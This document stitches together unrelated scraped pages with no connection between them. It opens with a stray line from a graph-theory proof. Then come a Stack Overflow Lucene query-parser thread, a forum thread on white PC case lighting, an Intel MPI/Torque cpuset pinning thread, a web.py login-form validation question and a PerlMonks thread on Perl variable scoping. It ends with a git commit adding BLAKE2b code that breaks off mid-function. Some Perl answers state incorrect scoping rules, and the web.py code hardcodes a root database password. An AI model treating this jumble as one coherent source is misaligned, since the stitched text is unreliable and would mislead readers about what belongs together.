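This also hints at the intended argument of the exercise: if $x_1$ had a neighbor $v \notin \{x_1, \ldots, x_k\}$, then $v\, x_1 x_2 \cdots x_k$ would be a longer path than $p$, contradicting the maximality of $p$; the same reasoning applies to $x_k$.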
Stack Overflow

Question (Lucene default operator):
I am using Lucene to allow a user to search for words in a large number of documents. Lucene seems to default to returning all documents containing any of the words entered. Is it possible to change this behaviour? I know that '+' can be used to force a term to be included, but I would like to make that the default action.

Ideally I would like functionality similar to Google's: '-' to exclude words and "abc xyz" to group words.

Just to clarify, I also thought of inserting '+' into all spaces in the query. I just wanted to avoid detecting grouped terms (brackets, quotes, etc.) and potentially breaking the query. Is there another approach?

Answer (accepted, +22):
This looks similar to the Lucene Sentence Search question. If you're interested, this is how I answered that question:

    String defaultField = ...;
    Analyzer analyzer = ...;
    QueryParser queryParser = new QueryParser(defaultField, analyzer);
    queryParser.setDefaultOperator(QueryParser.Operator.AND);
    Query query = queryParser.parse("Searching is fun");

Comment: +1, I have been looking for this and glad that I found it in SO. (mohang, Apr 11 '12)

Answer:
Why not just pre-parse the user search input and adjust it to fit your criteria using the Lucene query syntax before passing it on to Lucene? Alternatively, you could just create some help documentation on how to use the standard syntax to create a specific query, and let the user decide how the query should be performed.

Answer:
Lucene has an extensive query language, as described here, that covers everything you want except for '+' being the default; that you can simply handle by replacing spaces with '+'. So the only thing you need to do is define the format in which you want people to enter their search queries (I would strongly advise adhering to the default Lucene syntax), and then write the transformation from your own syntax to the Lucene syntax.

Answer:
The behavior is hard-coded in method addClause(List, int, int, Query) of class org.apache.lucene.queryParser.QueryParser, so the only way to change the behavior (other than the workarounds above) is to change that method. The end of the method looks like this:

    if (required && !prohibited)
        clauses.addElement(new BooleanClause(q, BooleanClause.Occur.MUST));
    else if (!required && !prohibited)
        clauses.addElement(new BooleanClause(q, BooleanClause.Occur.SHOULD));
    else if (!required && prohibited)
        clauses.addElement(new BooleanClause(q, BooleanClause.Occur.MUST_NOT));
    else
        throw new RuntimeException("Clause cannot be both required and prohibited");

Changing "SHOULD" to "MUST" should make clauses (e.g. words) required by default.

Answer:
Like Adam said, there's no need to do anything to the query string. QueryParser's setDefaultOperator does exactly what you're asking for.
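As a footnote to the pre-parsing answer above, which describes the approach without code: below is a hedged sketch of what such a transformation might look like. It is written in Python purely to illustrate the string manipulation (the thread's context is Java), and the tokenizing is deliberately naive; it keeps quoted phrases intact but does not handle parentheses or nested operators.

    import re

    def to_required_terms(user_query):
        # Split into quoted phrases and bare words, keeping quotes intact.
        tokens = re.findall(r'"[^"]*"|\S+', user_query)
        out = []
        for tok in tokens:
            # Leave explicitly negated or already-required terms alone.
            if tok.startswith(('+', '-')):
                out.append(tok)
            else:
                out.append('+' + tok)  # make the term mandatory by default
        return ' '.join(out)

    print(to_required_terms('abc xyz -foo "bar baz"'))
    # +abc +xyz -foo +"bar baz"

The output is still ordinary Lucene query syntax, so it can be handed to the stock query parser; the setDefaultOperator approach in the accepted answer achieves the same result with less room for error.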
Lighting up the inside of a case - RGB?
Discussion in 'Die-hard Overclocking & Case Modifications' started by Shakey_Jake33, Jan 13, 2020.

1. Shakey_Jake33 (Master Guru, GPU: RTX 2060 2010/2675)
This is a very newbie question. I've never really messed with RGB because I fundamentally dislike adding unnecessary cables and having to use extra software, as well as finding RGB to look a bit tacky. However, there's a specific thing I want to achieve.

Basically, I'm thinking about lighting up the inside of my case with white light. My graphics card already has this and lights up the bottom half really well by itself, but the upper half has been pitch black since I replaced the AMD stock cooler. I'm thinking that if I can get some subtle white light inside the case and pair it with a white MicroATX case, it'll look pretty classy with the black motherboard.

What would be the best way to do this? I was thinking about going the RGB route using white 120mm fans, but would this actually light things up too much? I'm not looking for crazy pattern effects, and would rather not have an extra RGB controller and software if it can be avoided. Would LED fans be a good solution? LED strips? I'm open to any ideas!

My end goal is a pure white MicroATX case with a window, the internals lit with white light that generally looks classy and stylish rather than 'gamer RGB'. Thanks!

2. insp1re2600 (Maha Guru, GPU: RTX 2080TI OC H20)

3. Shakey_Jake33 (Master Guru, GPU: RTX 2060 2010/2675)
Thanks! That looks like a good solution if it can be done discreetly. Might pay extra for the Coolermaster one, since it looks like the light will be spread more consistently.
Intel® oneAPI HPC Toolkit forum
How to pin Intel MPI processes within Torque cpusets? "Set domain" issues

shamov_um:
Hi, I think I have a problem with process pinning with an older version of Intel MPI (4.0.1). The version cannot be changed because it is bundled with the user's application (Accelrys Materials Studio) and there are tons of scripts surrounding it. The code works when started interactively, but when run under the Torque batch system, there are the following messages:

    [6] MPI startup(): set domain {10,11} fails on node XXX.local
    [5] MPI startup(): set domain {9} fails on node XXX.local
    [7] MPI startup(): set domain {10,11} fails on node XXX.local
    [4] MPI startup(): set domain {9} fails on node XXX.local

The code then fails when run across the nodes, or runs slowly within a single node. I can run the same code on the same data interactively across the nodes, and I don't see the "set domain" messages.

Our site uses Torque cpusets. So I suspect the difference between running interactively and from a batch script is the cpusets and the pinning of the processes. First question: am I correct? What do these "set domain fails" messages really mean?

Torque gives the list of CPU cores allocated for the job in its cpuset: /dev/cpuset/torque/JOB_ID/cpus will contain something like "8-11" or "0-7". I have tried to pass it to Intel MPI as follows:

    range=`cat /dev/cpuset/torque/$PBS_JOBID/cpus`
    export I_MPI_PIN=enable
    export I_MPI_PIN_PROCS=$range
    [... RunMatServer.sh starts ...]

It seems to pin cores to something, and I don't get the "set domain" messages anymore. The second question is: is that a right/correct way to interface Torque cpusets with Intel MPI jobs?

-- Grigory Shamov, University of Manitoba / Westgrid

shamov_um:
Update: either with pinning, or with I_MPI_PIN=disable, there is the same problem. A job that successfully runs interactively on two nodes fails when run under Torque, on the very same nodes, with the following error message:

    Fatal error in PMPI_Bcast: Message truncated, error stack:
    PMPI_Bcast(1920)..................: MPI_Bcast(buf=0x7fff86db0ac0, count=1, MPI_LONG, root=0, MPI_COMM_WORLD) failed
    MPIR_Bcast(1236)..................:
    MPIR_Bcast_Shum_ring(1039)........:
    MPIDI_CH3U_Receive_data_found(129): Message from rank 3 and tag 2 truncated; 532 bytes received but buffer size is 8
    [1:n008] unexpected disconnect completion event from [4:n189]
    Assertion failed in file ../../dapl_module_util.c at line 2682: 0

I'm at a loss as to what might cause the difference.

-- Grigory Shamov

James_T_Intel (Moderator):
Hi Grigory,

There is currently an incompatibility between the Intel® MPI Library and cpuset. We have some possible workarounds, but they are intended for current versions, and I don't know if they will work on earlier versions. Are you using Hydra or MPD as your process manager? If you are using Hydra, try setting HYDRA_BINDLIB=none and see if that helps. You could also try to fully subscribe each node, which might help avoid the problem. If you can disable cpuset, that should also help.

If the ISV software dynamically links to the Intel® MPI Library, you might be able to use the current version. If you install the runtime version (go to http://www.intel.com/go/mpi and select the Runtime for Linux* link on the right), you should be able to link to the current version instead of the older version. This will likely not help in this situation, as the cpuset incompatibility is still present, but when a fix is implemented and released, you should be able to use it.

Sincerely,
James Tullos
Technical Consulting Engineer
Intel® Cluster Tools

shamov_um:
Dear James,

Thank you for the reply! I've tried requesting whole nodes and setting HYDRA_BINDLIB=none. For the shm:dapl fabric, it made a change in that the job doesn't fail immediately but rather freezes (the processes are there, but no output is produced). I'm not sure it is cpusets or something else here.

-- Grigory Shamov
Stack Overflow

Question (web.py form validation):
I am using the web.py framework to design a small web application. I have created a login page; the code is below.

index.py:

    import web
    from web import form
    from web.contrib.auth import DBAuth
    import MySQLdb as mdb

    render = web.template.render('templates/')

    urls = (
        '/', 'Login',
        '/projects', 'Projects',
        '/logout', 'Logout',
    )

    # Create the application object, the mediator between our classes and
    # the web: it handles browser requests and serves the pages.
    app = web.application(urls, globals())

    web.config.debug = False
    db = web.database(dbn='mysql', db='Python_Web', user='root', pw='redhat')
    settings = {}

    if web.config.get('_session') is None:
        session = web.session.Session(app, web.session.DiskStore('sessions'),
                                      initializer={'user': 'anonymous', 'loggedin': False})
        web.config._session = session
    else:
        session = web.config._session

    auth = DBAuth(app, db, session, **settings)

    def logged():
        if session['loggedin'] == 1:
            return True
        else:
            return False

    class Login:
        # field validators
        username_required = form.Validator("Username not provided", bool)
        password_required = form.Validator("Password not provided", bool)

        # form validators
        login_details_required = form.Validator("Please Enter Login Details",
                                                lambda f: f["username"] or f["password"])

        login_form = form.Form(
            form.Textbox('username', username_required),
            form.Password('password', password_required, description="Password"),
            form.Button('Login'),
        )

        def GET(self):
            if logged():
                raise web.seeother('/projects')
            else:
                form = self.login_form()
                return render.login(form)

        def POST(self):
            form = self.login_form()
            if not form.validates():
                return render.login(form)
            i = web.input()
            username = i.username.strip()
            password = i.password.strip()
            user = auth.authenticate(username, password)
            if not user:
                session.loggedin = False
                return render.login_error(form)
            else:
                auth.login(user)
                session.loggedin = True
                session.user = i.username.strip()
                raise web.seeother('/projects')

    if __name__ == "__main__":
        web.internalerror = web.debugerror
        app.run()

Here in the above code, my intention is:

1. If the username is not provided, it should display "Username not provided" when Login is clicked.
2. If the password is not provided, it should display "Password not provided" when Login is clicked.
3. If a password is provided but its length is less than 7 characters, it should display "Password length should be minimum 7 characters" when Login is clicked. (Of course, this validation concept really belongs where a user creates an account and selects a password.)
4. If both are not provided, it should display "Please Enter Login Details" when Login is clicked.
5. If the login details do not match, it should display "Invalid Username or Password" when Login is clicked; if they match, it should redirect to the next page.

In the above code, when the login details match, it redirects to the next page successfully; if not, it displays "Invalid Username or Password" through return render.login_error(form). (I copied the same HTML code from the login(form) page to login_error(form) and added the extra "Invalid Username or Password" line in it.)

Also, I created a regex expression for password validation and hope it works (I didn't check exactly), because if the password length is less than 7 characters, it does not redirect to the next page and instead redirects to the same login page. But at the same time, I want to display the message "Password length should be minimum 7 characters" in the browser, which I am unable to do (I don't know how).

Also, I had given the username a form.notnull() validation in the Form creation as above. When I click Login, it checks whether the form validates, and if not, redirects to the same login page; but I want to display the message "Please enter the username", and likewise for the password if it is not provided.

My questions:

1. Will the above regex work correctly? (I haven't worked with regexes until now.)
2. How do I display the above validation messages in the browser when the username or password is not provided? I had created another HTML page just for the "Invalid Username or Password" message to appear when the details are incorrect.

Can we do all these validations in a single HTML file (like login.html)? I have tried a lot, but I am unable to catch the process going on here. If so, we could avoid creating more than one HTML file for the individual messages. Can anyone let me know how to solve the above problems? Please bear with my queries; this is my first step in web applications, and I haven't worked on web applications before.

Answer (accepted):
You can add many validators to the same input field, and there are also form-level validations.

    from web import form

    # field validators
    username_required = form.Validator("Username not provided", bool)
    password_required = form.Validator("Password not provided", bool)
    password_length = form.Validator("Password length should be minimum 7 characters",
                                     lambda p: p is None or len(p) >= 7)

    # form validators
    login_details_required = form.Validator("Please Enter Login Details",
                                            lambda f: f["username"] or f["password"])

    def check_login(f):
        # check for login here
        return False

    valid_credentials = form.Validator("Invalid username or password", check_login)

    login_form = form.Form(
        form.Textbox('username', username_required),
        form.Password('password', password_required, password_length, description="Password"),
        form.Button('Login'),
        validators=[login_details_required, valid_credentials],
    )

    my_form = login_form()
    if not my_form.validates(dict(username="", password="small")):
        print my_form.render_css()

    if not my_form.validates(dict(username="notnull", password="just-enough")):
        print my_form.render_css()

Note that login_details_required won't be triggered, because form-level validation is only triggered when all field validators have passed.
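For reference, a hedged sketch of how these messages can surface in a hand-written template rather than via form.render() (an editorial addition: it relies on web.py attaching a .note attribute to each input, and a form-level note to the form itself, after validates() fails, which is how web.py's form module reported errors in that era; treat the template details as illustrative):

    # In the POST handler: after a failed validates(), each input carries its
    # validation message in .note, and form-level validators set form.note.
    form = self.login_form()
    if not form.validates():
        # e.g. form['username'].note == "Username not provided"
        # e.g. form['password'].note == "Password not provided"
        # e.g. form.note == "Please Enter Login Details"
        return render.login(form)

Then a custom login.html can keep its own markup and only pull the notes out of the form object it receives, along the lines of:

    $if form['username'].note:
        <span class="error">$form['username'].note</span>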
i got the point where its not working. Actually after creating a login_form in the above code i am sending in to render.login(login_form), but i am not rendering it in html page like $:login_form.render,i created separate html for login page in index.html for username,password,login button.But actually i don't want to render it, i want to create my own html and functionality should work,is it possible to validate and display these messages on the browser with rendering $:form.render() in index.html ? –  shiva krishna Oct 18 '12 at 12:27 show 2 more comments Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
Beefy Boxes and Bandwidth Generously Provided by pair Networks Pathologically Eclectic Rubbish Lister   PerlMonks   Our, use vars, and magic, oh my! by OzzyOsbourne (Chaplain) on Aug 23, 2001 at 16:58 UTC ( #107303=perlquestion: print w/replies, xml ) Need Help?? OzzyOsbourne has asked for the wisdom of the Perl Monks concerning the following question: I looked at the docs, looked at some threads, delved into the CB, and consulted the magic 8 ball, but I still can't seem to get my head around the answer to: What is the difference between my, use vars, and our? Most answers seemed vague, or I just didn't understand. The most worrysome answer was "Outlook not so good" from the magic 8-ball. I'm an NT admin. I know about Outlook not so good. Tell me about Perl scope, 8-ball. Perl scope! What I think I know: • my declares variables in lexical scope. Yup, got it. • use vars allows you to declare global variables, and refer to $package::$foo as $foo. Right on. • and our is the same as use vars but with lexical scope. A globally lexically thingy. OK. So on line 4 or 5, before any blocks, I declare my $foo. It acts with a lexical scope of the entire script. It acts sort of like a global variable. What if I put our $foo in the same place. Do I get the same effect? What if I put use vars $foo? My questions: 1. Is there any difference between declaring variables at the beginning of scripts with my or our? Won't their scope be the same? 2. Is there a reason to use one or the other in this situation See this example. Look at %TOC. Should it be my or our? Thanks for your help. -OzzyOsbourne Replies are listed 'Best First'. Re: Our, use vars, and magic, oh my! by dragonchild (Archbishop) on Aug 23, 2001 at 17:34 UTC In a one-file script, there is no difference between my, our, and use vars, when declaring a variable outside any given block. However, the difference comes in when working with functions or multi-file applications. • my says that this variable cannot be used outside its scope. When this scope goes away, this variable is killed. • our says that this variable cannot be used outside its scope. When this scope goes away, this variable stays around. • use vars says that this variable gets to ignore strict. It has no scope (other than the whole program). A good code example would be the following: sub foo { my $x; $x++; return $x; } print foo() for (0 .. 10); Try that, then change my to our. You'll see what I mean. ------ /me wants to be the brightest bulb in the chandelier! Vote paco for President! Re: Our, use vars, and magic, oh my! by chipmunk (Parson) on Aug 23, 2001 at 21:20 UTC There are basically two kinds of variables in Perl. • Package variables live in the symbol table, and are accessible from anywhere in the program. (In some cases the access requires using a package qualifier.) • Lexical variables do not live in the symbol table, and are accessible only from within the lexical scope where they are declared. However, there are three ways to declare a variable (in the latest version of Perl). • use vars qw/ $var /; declares $var as a variable in the current package. Within that package, you can write $var to get that variable. From anywhere, you can write $Pkg::var. • my $var; declares $var as a variable in the current lexical scope. Within that scope, you can write $var to get that variable. That's the only way you can access it, and the only place in the code you can access it. 
• our $var; declares $var as a variable in the current package, and sets up $var as an alias to that variable within the current lexical scope. Within that scope, you can write $var to get that variable. From anywhere, you can write $Pkg::var.

Of course, this will be much easier to understand with some examples.

An excellent explanation, but if you look at the example that I provided, what is the answer to question 1? The only post that seems to answer the question is dga's. Are my and our the same in my example?

-OzzyOsbourne

This is, in many ways, a followup to chipmunk's excellent post, but with a slight twist, in that I do not consider our() or 'use vars' as ways of declaring global variables (there is a subtle but important distinction to be made).

OzzyOsbourne asks:

1. Is there any difference between declaring variables at the beginning of scripts with my or our? Won't their scope be the same?

Yes, there is a difference, and the difference is that no, the scopes of the *variables* will not be the same: one will be a lexical variable (my) and the other will be a package-global variable (our).

I think one major problem people have with my(), our(), and 'use vars' is that we all tend to discuss them as ways of declaring 'variables', and then confusion sets in because the scope of what we declared doesn't always coincide with the scope of the variable, which doesn't seem to make sense. Do not think of our() and 'use vars' as ways of declaring *variables* and things become clearer. Lexical variables *are* declared and created with the my() declaration. Package variables are never really "declared" at all ... what is really being declared with either 'use vars' or our() is not the variable per se, but "unqualified access" to a package variable under the 'strict' pragma.

You seem to be looking for an answer that says, "You absolutely should use my..." or "You absolutely should use our..." to declare variables at the top of the script. Well, there really isn't a definite answer like that. It partly depends on how you're using the variables, and partly on personal preference. If you are only using the variables from within that file, then you can declare with my. But you can still declare with use vars or our as well. It's really up to you. The script you're asking about should work the same whichever way you declare %TOC. If you are accessing the variables from another file, then you have to declare with use vars or our. They are mostly the same when used at the top of the file, but our has the unusual behavior of crossing package boundaries.

Personally, I still do most of my coding for perl5.005, so I don't use our. I generally use my, except when I'm declaring package variables or working with mod_perl.

Re: Our, use vars, and magic, oh my!
by mandog (Curate) on Aug 23, 2001 at 17:10 UTC

Yes, but I still don't understand the initial declaration in his final example...

-OzzyOsbourne

Re: Our, use vars, and magic, oh my!
by arhuman (Vicar) on Aug 23, 2001 at 17:58 UTC

The only thing that bothers me is that we have at the same time:

• 'use vars' and 'our' are equivalent in the sense that they make a variable reachable from outside of the package.
• 'our' makes a variable lexically scoped.

I have no problem with the first point (I've checked it several times). But I thought that lexically scoped vars couldn't be accessed from the outside because they weren't in the package's namespace (but were in a 'scratchpad').
Did I wrongly assume that 'lexically scoped' implied the use of a 'scratchpad' (was it rather that 'my var' implies use of a scratchpad), or does it mean that despite being lexically scoped an 'our' variable is also 'exported' into the namespace? Anyone to clear this point?

"Only Bad Coders Code Badly In Perl" (OBC2BIP)

The fact that a variable is lexically scoped doesn't imply anything about the internal implementation. Lexical scoping is more a matter of syntax than anything else. According to the man page perlfunc:our, or perldoc -f our, you can see that what the package Foo; our $foo; declaration does is get the interpreter to see occurrences of $foo unadorned, as it were, as occurrences of $Foo::foo, so it's a plain ol' package global:

An "our" declaration declares a global variable that will be visible across its entire lexical scope, even across package boundaries. The package in which the variable is entered is determined at the point of the declaration, not at the point of use.

HTH

perl -e 'print "How sweet does a rose smell? "; chomp ($n = <STDIN>); $rose = "smells sweet to degree $n"; *other_name = *rose; print "$other_name\n"'

Re: Our, use vars, and magic, oh my!
by dga (Hermit) on Aug 23, 2001 at 19:32 UTC

Update: can't believe I missed an important point. This is only if these are declared in a separate block. D'oh.

    my $x;
    if($test) {
        my $z;
        func();
    }

    sub func {
        # can't see $z
        # can see $x since the sub is in the same scope as $x
    }

Mea culpa.

1. Is there any difference between declaring variables at the beginning of scripts with my or our? Won't their scope be the same?
2. Is there a reason to use one or the other in this situation?

1. The scope is the same. our variables cannot be used outside the current file (unless they are declared in the other file of course). In the file there is an important difference though. our variables can be seen in subroutines, and my variables declared at the top of your script cannot be seen inside your subroutines. You must pass them in.

2. If you don't want your subs to see the variables without being passed in (i.e. as globals), then you should use my.

our variables can be seen in subroutines and my variables declared at the top of your script cannot be seen inside your subroutines.

This is only true if you put your subroutines above the top of the script, i.e. above the my declarations. Some code, where $var can be accessed in the subroutine:

    use strict;
    my $var = 4;
    sub foo {
        $var = 'bar';
    }
    foo;
    print $var;

-- Hofmator
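To tie the thread together, here is a small sketch (mine, not from the thread) of the one observable difference the monks keep circling, namely access from another package:

    use strict;

    package Foo;
    our $shared = 'package variable';   # really $Foo::shared, plus a file-wide lexical alias
    my $hidden  = 'lexical variable';   # lives in a scratchpad, not in any symbol table

    package Bar;
    print "$shared\n";       # works: the our() alias crosses the package boundary
    print "$Foo::shared\n";  # works from anywhere via the fully qualified name
    # There is no $Foo::hidden -- a my() variable has no package-qualified name.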
package simple and robust package manager Log | Files | Refs | README commit cb72f0ce1211844241aeb99eae7ba529d06c3a91 parent 6473a11e4fb8b5b09ac31048a4336b90ddfad3d2 Author: Josuah Demangeon <[email protected]> Date: Mon, 21 Jan 2019 23:51:00 +0100 initial import of blake2b Diffstat: MMakefile | 4+++- Abin/package-del | 26++++++++++++++++++++++++++ Ablake2b.c | 385+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Ablake2b.h | 65+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Mlog.c | 12++++-------- Mmem.c | 6++++++ Mmem.h | 1+ Mpackage-add.c | 12++++-------- Mpackage-install.c | 3+-- Mpackage-tree.c | 6++---- Mpackage.c | 44+++++++++++++++++--------------------------- Mpackage.h | 2-- Auint32.c | 39+++++++++++++++++++++++++++++++++++++++ Auint32.h | 14++++++++++++++ Muint64.c | 54++++++++++++++++++++++++------------------------------ Muint64.h | 11+++++++---- 16 files changed, 598 insertions(+), 86 deletions(-) diff --git a/Makefile b/Makefile @@ -1,5 +1,5 @@ bin = package-build package-dep package-get package-tree package-add package-install -obj = package.o buffer.o fmt.o stat.o hier.o log.o mem.o str.o stralloc.o forkexec.o tai.o tain.o +obj = package.o buffer.o fmt.o stat.o hier.o log.o mem.o str.o stralloc.o forkexec.o tai.o tain.o blake2b.o uint64.o uint32.o .PHONY: all all: ${bin} @@ -35,6 +35,7 @@ package-install: package-install.o ${obj} .c.o: ./make-o $< +blake2b.o: blake2b.c blake2b.h mem.h uint32.h uint64.h buffer.o: buffer.c buffer.h mem.h stralloc.h fmt.o: fmt.c fmt.h str.h forkexec.o: forkexec.c open.h forkexec.h @@ -53,4 +54,5 @@ str.o: str.c str.h stralloc.o: stralloc.c mem.h fmt.h str.h stralloc.h tai.o: tai.c tai.h tain.o: tain.c tain.h uint64.h fmt.h +uint32.o: uint32.c uint32.h uint64.o: uint64.c uint64.h diff --git a/bin/package-del b/bin/package-del @@ -0,0 +1,26 @@ +#!/bin/sh -e + +PACKAGE_DIR=/package +PACKAGE_ROOT=/ + +usage() { + printf '%s [-p pkgdir] package/version\n' "$0" + exit 1 +} + +while [ "$#" -gt 0 ]; do + case "$1" in + (-p) shift; PACKAGE_DIR=$1 ;; + (-r) shift; PACKAGE_ROOT=$1 ;; + (-*) usage ;; + (*) break ;; + esac + shift +done + +[ "$#" -eq 1 ] || usage +case "$1" in (*/*) ;; (*) usage ;; esac + +rm "$PACKAGE_DIR/$1/current" + +find -L "$PACKAGE_ROOT/bin" -type l -exec rm {} + diff --git a/blake2b.c b/blake2b.c @@ -0,0 +1,385 @@ +/* + * BLAKE2 reference source code package - C implementations + * + * Written in 2012 by Samuel Neves <[email protected]> + * Changed in 2019 by Josuah Demangeon <[email protected]> + * + * To the extent possible under law, the author(s) have dedicated all copyright + * and related and neighboring rights to this software to the public domain + * worldwide. This software is distributed without any warranty. + * + * You should have received a copy of the CC0 Public Domain Dedication along + * with + * this software. If not, see + * <http://creativecommons.org/publicdomain/zero/1.0/>. + */ + +#include <assert.h> + +#include "blake2b.h" +#include "mem.h" +#include "uint32.h" +#include "uint64.h" + +#define COMPILER_ASSERT(X) (void) sizeof(char[(X) ? 
1 : -1]) + +static const uint64_t blake2b_IV[8] = { + 0x6a09e667f3bcc908ULL, 0xbb67ae8584caa73bULL, 0x3c6ef372fe94f82bULL, + 0xa54ff53a5f1d36f1ULL, 0x510e527fade682d1ULL, 0x9b05688c2b3e6c1fULL, + 0x1f83d9abfb41bd6bULL, 0x5be0cd19137e2179ULL +}; + +static const uint8_t blake2b_sigma[12][16] = { + { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 }, + { 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 }, + { 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 }, + { 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 }, + { 9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13 }, + { 2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9 }, + { 12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11 }, + { 13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10 }, + { 6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5 }, + { 10, 2, 8, 4, 7, 6, 1, 5, 15, 11, 9, 14, 3, 12, 13, 0 }, + { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 }, + { 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 } +}; + +static inline int +blake2b_set_lastnode(blake2b_state *S) +{ + S->f[1] = -1; + return 0; +} + +static inline int +blake2b_is_lastblock(const blake2b_state *S) +{ + return S->f[0] != 0; +} + +static inline int +blake2b_set_lastblock(blake2b_state *S) +{ + if (S->last_node) + blake2b_set_lastnode(S); + S->f[0] = -1; + return 0; +} + +static inline int +blake2b_increment_counter(blake2b_state *S, const uint64_t inc) +{ + S->t[0] += inc; + S->t[1] += (S->t[0] < inc); + return 0; +} + +/* Parameter-related functions */ +static inline int +blake2b_param_set_salt(blake2b_param *P, const uint8_t salt[BLAKE2B_SALTBYTES]) +{ + mem_copy(P->salt, salt, BLAKE2B_SALTBYTES); + return 0; +} + +static inline int +blake2b_param_set_personal(blake2b_param *P, const uint8_t personal[BLAKE2B_PERSONALBYTES]) +{ + mem_copy(P->personal, personal, BLAKE2B_PERSONALBYTES); + return 0; +} + +static inline int +blake2b_init0(blake2b_state *S) +{ + int i; + + for (i = 0; i < 8; i++) { + S->h[i] = blake2b_IV[i]; + } + /* zero everything between .t and .last_node */ + mem_zero((void *) &S->t, + offsetof(blake2b_state, last_node) + sizeof(S->last_node) + - offsetof(blake2b_state, t)); + return 0; +} + +/* init xors IV with input parameter block */ +int +blake2b_init_param(blake2b_state *S, const blake2b_param *P) +{ + size_t i; + const uint8_t *p; + + COMPILER_ASSERT(sizeof *P == 64); + blake2b_init0(S); + p = (const uint8_t *) (P); + + /* IV XOR ParamBlock */ + for (i = 0; i < 8; i++) + S->h[i] ^= uint64_unpack_le(p + sizeof(S->h[i]) * i); + return 0; +} + +int +blake2b_init(blake2b_state *S, const uint8_t outlen) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = 0; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + mem_zero(P->salt, sizeof(P->salt)); + mem_zero(P->personal, sizeof(P->personal)); + return blake2b_init_param(S, P); +} + +int +blake2b_init_salt_personal(blake2b_state *S, const uint8_t outlen, const void *salt, const void *personal) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = 0; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + + if (salt != NULL) + blake2b_param_set_salt(P, (const uint8_t *) salt); + else + mem_zero(P->salt, sizeof(P->salt)); + + if (personal 
!= NULL) + blake2b_param_set_personal(P, (const uint8_t *) personal); + else + mem_zero(P->personal, sizeof(P->personal)); + + return blake2b_init_param(S, P); +} + +int +blake2b_init_key(blake2b_state *S, const uint8_t outlen, const void *key, const uint8_t keylen) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = keylen; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + mem_zero(P->salt, sizeof(P->salt)); + mem_zero(P->personal, sizeof(P->personal)); + + { + uint8_t block[BLAKE2B_BLOCKBYTES]; + mem_zero(block, BLAKE2B_BLOCKBYTES); + mem_copy(block, key, keylen); /* key and keylen cannot be 0 */ + blake2b_update(S, block, BLAKE2B_BLOCKBYTES); + mem_zero(block, BLAKE2B_BLOCKBYTES); /* Burn the key from stack */ + } + return 0; +} + +int +blake2b_init_key_salt_personal(blake2b_state *S, const uint8_t outlen, const void *key, const uint8_t keylen, const void *salt, const void *personal) +{ + blake2b_param P[1]; + + P->digest_length = outlen; + P->key_length = keylen; + P->fanout = 1; + P->depth = 1; + uint32_pack_le(P->leaf_length, 0); + uint64_pack_le(P->node_offset, 0); + P->node_depth = 0; + P->inner_length = 0; + mem_zero(P->reserved, sizeof(P->reserved)); + + if (salt != NULL) + blake2b_param_set_salt(P, (const uint8_t *) salt); + else + mem_zero(P->salt, sizeof(P->salt)); + + if (personal != NULL) + blake2b_param_set_personal(P, (const uint8_t *) personal); + else + mem_zero(P->personal, sizeof(P->personal)); + + { + uint8_t block[BLAKE2B_BLOCKBYTES]; + mem_zero(block, BLAKE2B_BLOCKBYTES); + mem_copy(block, key, keylen); /* key and keylen cannot be 0 */ + blake2b_update(S, block, BLAKE2B_BLOCKBYTES); + mem_zero(block, BLAKE2B_BLOCKBYTES); /* Burn the key from stack */ + } + return 0; +} + +/* inlen now in bytes */ +int +blake2b_update(blake2b_state *S, const uint8_t *in, uint64_t inlen) +{ + while (inlen > 0) { + size_t left = S->buflen; + size_t fill = 2 * BLAKE2B_BLOCKBYTES - left; + + if (inlen > fill) { + mem_copy(S->buf + left, in, fill); /* Fill buffer */ + S->buflen += fill; + blake2b_increment_counter(S, BLAKE2B_BLOCKBYTES); + blake2b_compress(S, S->buf); /* Compress */ + mem_copy(S->buf, S->buf + BLAKE2B_BLOCKBYTES, + BLAKE2B_BLOCKBYTES); /* Shift buffer left */ + S->buflen -= BLAKE2B_BLOCKBYTES; + in += fill; + inlen -= fill; + } else { + mem_copy(S->buf + left, in, inlen); + S->buflen += inlen; /* Be lazy, do not compress */ + in += inlen; + inlen -= inlen; + } + } + + return 0; +} + +int +blake2b_final(blake2b_state *S, uint8_t *out, uint8_t outlen) +{ + unsigned char buffer[BLAKE2B_OUTBYTES]; + + if (blake2b_is_lastblock(S)) + return -1; + + if (S->buflen > BLAKE2B_BLOCKBYTES) { + blake2b_increment_counter(S, BLAKE2B_BLOCKBYTES); + blake2b_compress(S, S->buf); + S->buflen -= BLAKE2B_BLOCKBYTES; + assert(S->buflen <= BLAKE2B_BLOCKBYTES); + mem_copy(S->buf, S->buf + BLAKE2B_BLOCKBYTES, S->buflen); + } + + blake2b_increment_counter(S, S->buflen); + 